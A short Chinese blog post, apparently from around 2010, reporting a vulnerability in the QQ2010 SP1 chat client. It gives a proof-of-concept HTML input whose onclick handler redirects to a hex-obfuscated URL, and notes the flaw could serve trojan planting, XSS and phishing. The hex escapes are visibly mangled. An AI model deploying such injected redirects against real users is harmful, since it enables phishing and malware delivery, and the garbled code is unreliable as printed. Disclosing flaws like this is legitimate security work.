刚才和Ken的聊天中他告诉我说QQ2010 SP1出漏洞了。我还不是很相信。不过经过测试后,果真如此。
新版本是我今天早上给公司的电脑重装完新系统下载安装的,刚好是测试环境。
测试代码:
<input onclick=”window.location=’x68×74x74×70x3ax2fx2fx77×77x77×2ex62×6fx77×6fx73×2ex63×6fx6d’” />
而出现如图显示
利用此漏洞可以挂马 XSS 钓鱼等邪恶的事情. 等待修复中…
相关阅读